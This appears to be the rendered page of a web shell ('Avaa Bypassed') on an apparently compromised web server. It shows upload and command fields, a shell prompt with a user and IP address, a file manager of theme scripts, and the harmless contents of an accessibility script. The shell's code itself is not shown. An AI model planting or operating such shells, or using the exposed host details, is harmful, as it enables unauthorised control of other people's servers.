[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@3.145.53.35: ~ $
/**
 * File skip-link-focus-fix.js.
 *
 * Helps with accessibility for keyboard only users.
 *
 * Learn more: https://git.io/vWdr2
 */
(function() {
	var isIe = /(trident|msie)/i.test( navigator.userAgent );

	if ( isIe && document.getElementById && window.addEventListener ) {
		window.addEventListener( 'hashchange', function() {
			var id = location.hash.substring( 1 ),
				element;

			if ( ! ( /^[A-z0-9_-]+$/.test( id ) ) ) {
				return;
			}

			element = document.getElementById( id );

			if ( element ) {
				if ( ! ( /^(?:a|select|input|button|textarea)$/i.test( element.tagName ) ) ) {
					element.tabIndex = -1;
				}

				element.focus();
			}
		}, false );
	}
})();

Filemanager

Name Type Size Permission Actions
customize-controls.js File 1.1 KB 0644
customize-preview.js File 4.38 KB 0644
global.js File 7.64 KB 0644
html5.js File 10.09 KB 0644
jquery.scrollTo.js File 5.68 KB 0644
navigation.js File 3.67 KB 0644
skip-link-focus-fix.js File 683 B 0644